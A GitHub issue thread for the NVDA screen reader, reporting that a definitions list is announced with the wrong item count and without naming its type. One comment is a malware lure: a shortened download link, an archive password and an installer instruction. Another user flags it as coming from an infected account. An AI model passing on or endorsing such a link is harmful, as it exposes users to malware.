### ISSUE TITLE
Wrong announcement when navigating to definitions list with arrow keys

### ISSUE THREAD

**Issue by sevapopov2** [nvaccess/nvda#17065]
### Steps to reproduce:
1. Open HTML file included in the [attached zip archive](https://github.com/user-attachments/files/16766204/Definitions_list.zip).
2. Navigate to definitions list with arrow keys.

### Actual behavior:
NVDA announces that there are 4 list items when there are 2 terms and 1 definition for each term (e.g. list  with 4 items). NVDA doesn't announce that this is the definitions list (e.g. definitions list with x items).

### Expected behavior:
NVDA announces that there are 2 list items without counting definitions for each term as list items. NVDA announces the type of the list as definitions list or something like that to separate it from bulleted list (e.g. definitions list with 2 items).

### NVDA logs, crash dumps and other attachments:
Not applicable.

#### NVDA installed/portable/running from source:
Installed.

#### NVDA version:
2024.3 (2024.3.0.33433)

#### Windows version:
Windows 11 Pro 22H2 64 Bit.

#### Name and version of other software in use when reproducing the issue:
Google Chrome v128.0.6613.85 (Official build), (64 bit)

#### Does the issue still occur after restarting your computer?
Yes.

#### Have you tried any other versions of NVDA? If so, please report their behaviors.
No.

#### If NVDA add-ons are disabled, is your problem still occurring?
Yes.

#### Does the issue still occur after you run the COM Registration Fixing Tool in NVDA's tools menu?
Not applicable.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
@c0ffincolors Your system is infected and spreading malware with your account. Check your sessions in github settings, terminate everything suspicion, and change passwords from the phone / another machine, etc.

**Comment by Adriani90** [comment]
This is reflected in #3858. closing as duplicate.
